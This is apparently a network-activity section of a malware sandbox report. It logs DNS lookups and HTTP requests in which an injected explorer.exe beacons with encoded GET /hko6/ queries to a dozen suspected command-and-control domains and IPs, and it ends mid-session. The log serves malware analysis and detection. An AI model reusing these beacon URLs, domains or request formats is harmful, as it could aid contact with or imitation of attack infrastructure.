Nov 26, 2020 08:24:19.451456070 CET | 8.8.8.8 | 192.168.2.7 | 0xb884 | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:24:27.993083954 CET | 8.8.8.8 | 192.168.2.7 | 0x112 | Name error (3) | www.jacmkt.com | none | none | A (IP address) | IN (0x0001)
Nov 26, 2020 08:24:50.332254887 CET | 8.8.8.8 | 192.168.2.7 | 0x7a67 | Name error (3) | www.goodberryjuice.com | none | none | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:10.570861101 CET | 8.8.8.8 | 192.168.2.7 | 0x8534 | No error (0) | www.azery.site | onstatic-fr.setupdns.net | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:25:10.570861101 CET | 8.8.8.8 | 192.168.2.7 | 0x8534 | No error (0) | onstatic-fr.setupdns.net | - | 81.88.57.68 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:30.890439987 CET | 8.8.8.8 | 192.168.2.7 | 0x6e3a | No error (0) | www.fittcycleacademy.com | fittcycleacademy.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:25:30.890439987 CET | 8.8.8.8 | 192.168.2.7 | 0x6e3a | No error (0) | fittcycleacademy.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:25:47.727782965 CET | 8.8.8.8 | 192.168.2.7 | 0xf99e | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:25:51.244364023 CET | 8.8.8.8 | 192.168.2.7 | 0x3797 | No error (0) | www.mycapecoralhomevalue.com | mycapecoralhomevalue.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:25:51.244364023 CET | 8.8.8.8 | 192.168.2.7 | 0x3797 | No error (0) | mycapecoralhomevalue.com | - | 173.192.101.248 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:26:13.707748890 CET | 8.8.8.8 | 192.168.2.7 | 0x578d | No error (0) | www.nextgenmemorabilia.com | nextgenmemorabilia.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:26:13.707748890 CET | 8.8.8.8 | 192.168.2.7 | 0x578d | No error (0) | nextgenmemorabilia.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:26:34.068280935 CET | 8.8.8.8 | 192.168.2.7 | 0x58f9 | No error (0) | www.bitcoincandy.xyz | bitcoincandy.xyz | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:26:34.068280935 CET | 8.8.8.8 | 192.168.2.7 | 0x58f9 | No error (0) | bitcoincandy.xyz | - | 184.168.131.241 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:26:54.648833990 CET | 8.8.8.8 | 192.168.2.7 | 0xfe84 | No error (0) | www.nairobi-paris.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:26:54.648833990 CET | 8.8.8.8 | 192.168.2.7 | 0xfe84 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:27:15.050656080 CET | 8.8.8.8 | 192.168.2.7 | 0x1588 | No error (0) | www.multitask-improvements.com | multitask-improvements.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:27:15.050656080 CET | 8.8.8.8 | 192.168.2.7 | 0x1588 | No error (0) | multitask-improvements.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:27:35.803332090 CET | 8.8.8.8 | 192.168.2.7 | 0x2891 | Server failure (2) | www.best20banks.com | none | none | A (IP address) | IN (0x0001)
Nov 26, 2020 08:27:58.044636965 CET | 8.8.8.8 | 192.168.2.7 | 0xb714 | No error (0) | www.affiliateclubindia.com | affiliateclubindia.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:27:58.044636965 CET | 8.8.8.8 | 192.168.2.7 | 0xb714 | No error (0) | affiliateclubindia.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:28:18.846000910 CET | 8.8.8.8 | 192.168.2.7 | 0xc3c | No error (0) | www.chartershome.com | chartershome.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:28:18.846000910 CET | 8.8.8.8 | 192.168.2.7 | 0xc3c | No error (0) | chartershome.com | - | 192.185.199.129 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:28:39.557630062 CET | 8.8.8.8 | 192.168.2.7 | 0xd0dc | No error (0) | www.nationshiphop.com | nationshiphop.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:28:39.557630062 CET | 8.8.8.8 | 192.168.2.7 | 0xd0dc | No error (0) | nationshiphop.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:28:59.914695024 CET | 8.8.8.8 | 192.168.2.7 | 0xbd43 | No error (0) | www.cfmfair.com | cfmfair.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:28:59.914695024 CET | 8.8.8.8 | 192.168.2.7 | 0xbd43 | No error (0) | cfmfair.com | - | 104.164.35.80 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:29:40.649068117 CET | 8.8.8.8 | 192.168.2.7 | 0xbf1c | No error (0) | www.skinnerttc.com | skinnerttc.com | - | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 08:29:40.649068117 CET | 8.8.8.8 | 192.168.2.7 | 0xbf1c | No error (0) | skinnerttc.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 08:30:01.252055883 CET | 8.8.8.8 | 192.168.2.7 | 0x605d | Name error (3) | www.jacmkt.com | none | none | A (IP address) | IN (0x0001)
Nov 26, 2020 08:30:23.520160913 CET | 8.8.8.8 | 192.168.2.7 | 0xf5bc | Name error (3) | www.goodberryjuice.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.azery.site
• www.fittcycleacademy.com
• www.mycapecoralhomevalue.com
• www.nextgenmemorabilia.com
• www.bitcoincandy.xyz
• www.nairobi-paris.com
• www.multitask-improvements.com
• www.affiliateclubindia.com
• www.chartershome.com
• www.nationshiphop.com
• www.cfmfair.com
• www.skinnerttc.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49753 | 81.88.57.68 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 08:25:10.604625940 CET | 4442 | OUT | GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1
Host: www.azery.site
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 08:25:10.663077116 CET | 4443 | IN | HTTP/1.1 404 Not Found
Date: Thu, 26 Nov 2020 07:25:10 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49756 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 08:25:30.909708023 CET | 4466 | OUT | GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
Host: www.fittcycleacademy.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 08:25:31.024852037 CET | 4466 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 07:25:30 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c734-113"
Via: 1.1 google
Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49771 | 104.164.35.80 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 08:29:00.087791920 CET | 4624 | OUT | GET /hko6/?rL0=leTXDjYcUtkTOBo/XywC86s6NVsozqkX2a5kzyiD11BblheudN5U1IiLvUCvh9+vkOfDF9tr1A==&3f_X=Q2J8lT4hKB4 HTTP/1.1
Host: www.cfmfair.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 08:29:00.259849072 CET | 4624 | IN | HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Thu, 26 Nov 2020 07:28:58 GMT
Connection: close
Content-Length: 57
                                                                                      Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
                                                                                      Data Ascii:


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
11          192.168.2.7  49772        34.102.136.180   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:29:40.670552015 CET  4626                OUT        GET /hko6/?rL0=Z5wXWFR67775H9FWfAIDVOfBSfPNRfbmpsgUF7EF+miwYEgbR5wCg8jOIALgj8zBbklAwevO+Q==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.skinnerttc.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:29:40.785351992 CET  4626                IN         HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:29:40 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
12          192.168.2.7  49775        81.88.57.68      80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:30:43.695779085 CET  4648                OUT        GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=EYQ3CpWwSh2vHAFpwX7bfYNErBh8XjfonzY2Qz/ZEHgGxbW9TOQUf247lcv8UYdItcFHYpJ3ZA== HTTP/1.1
                                                                                      Host: www.azery.site
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:30:43.745044947 CET  4649                IN         HTTP/1.1 404 Not Found
                                                                                      Date: Thu, 26 Nov 2020 07:30:43 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6b 6f 36 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hko6/ was not found on this server.</p></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
13          192.168.2.7  49778        34.102.136.180   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:31:03.921262026 CET  4665                OUT        GET /hko6/?rL0=7JP9a7+0OyyDCtwY4BBiZHxvOcjmT/EmGsy/Rg5QxlKunDSy+zY41kj2/fIUtC9fXZTQqxticw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.fittcycleacademy.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:31:04.036468029 CET  4665                IN         HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:31:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
14          192.168.2.7  49779        173.192.101.248  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:31:24.320868969 CET  4666                OUT        GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1
                                                                                      Host: www.mycapecoralhomevalue.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:31:24.455890894 CET  4667                IN         HTTP/1.1 400 Bad Request
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      X-AspNetMvc-Version: 5.2
                                                                                      X-Powered-By: ASP.NET
                                                                                      Date: Thu, 26 Nov 2020 07:31:24 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 296
                                                                                      Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 3c 70 3e 53 6f 72 72 79 2c 20 62 75 74 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>404 - Page Not Found</title> <link rel="stylesheet" href="/error/error.css" /></head><body> <h1>404</h1> <h2>Page Not Found</h2> <p>Sorry, but the page you are looking for does not exist.</p></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
15          192.168.2.7  49780        34.102.136.180   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:31:44.627120972 CET  4667                OUT        GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.nextgenmemorabilia.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:31:44.742125988 CET  4668                IN         HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:31:44 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c9ca-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
2           192.168.2.7  49758        173.192.101.248  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:25:51.383757114 CET  4474                OUT        GET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1
                                                                                      Host: www.mycapecoralhomevalue.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:25:51.522063017 CET  4474                IN         HTTP/1.1 400 Bad Request
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      X-AspNetMvc-Version: 5.2
                                                                                      X-Powered-By: ASP.NET
                                                                                      Date: Thu, 26 Nov 2020 07:25:51 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 296
                                                                                      Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 3c 70 3e 53 6f 72 72 79 2c 20 62 75 74 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>404 - Page Not Found</title> <link rel="stylesheet" href="/error/error.css" /></head><body> <h1>404</h1> <h2>Page Not Found</h2> <p>Sorry, but the page you are looking for does not exist.</p></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
3           192.168.2.7  49759        34.102.136.180   80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Nov 26, 2020 08:26:13.726460934 CET  4476                OUT        GET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.nextgenmemorabilia.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
Nov 26, 2020 08:26:13.841572046 CET  4476                IN         HTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:26:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c9ca-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
4           192.168.2.7  49760        184.168.131.241  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
